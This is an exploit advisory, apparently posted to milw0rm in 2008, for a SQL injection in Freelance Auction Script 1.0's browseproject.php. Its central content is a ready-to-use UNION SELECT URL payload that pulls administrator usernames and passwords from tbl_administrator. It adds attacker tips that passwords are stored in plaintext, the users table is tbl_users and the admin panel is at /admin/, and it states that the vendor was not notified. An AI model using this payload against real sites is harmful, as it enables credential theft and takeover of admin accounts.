51 lines
No EOL
1.3 KiB
Text
51 lines
No EOL
1.3 KiB
Text
--==+================================================================================+==--
|
|
--==+ Freelance Auction Script 1.0 (browseproject.php) SQL Injection Vulnerability +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
Discovered By: t0pP8uZz
|
|
Discovered On: 14 MAY 2008
|
|
Script Download: http://freelanceauction.eu
|
|
DORK: N/A
|
|
|
|
|
|
|
|
Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
DESCRIPTION:
|
|
|
|
Freelance Auction Script (all versions to date) suffers from a insecure mysql query, this allows the
|
|
remote attacker to arbitrary execute mysql code/query's.
|
|
|
|
the below MySQL Injection will display the admin login details.
|
|
|
|
|
|
SQL Injection:
|
|
|
|
http://site.com/browseproject.php?mode=pdetails&pid=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/**/FROM/**/tbl_administrator/*
|
|
|
|
|
|
|
|
NOTE/TIP:
|
|
|
|
passwords are in plaintext.
|
|
users table "tbl_users"
|
|
admin login is at /admin/
|
|
|
|
|
|
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
|
|
|
|
|
|
|
|
peace, t0pP8uZz
|
|
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Freelance Auction Script 1.0 (browseproject.php) SQL Injection Vulnerability +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2008-05-14] |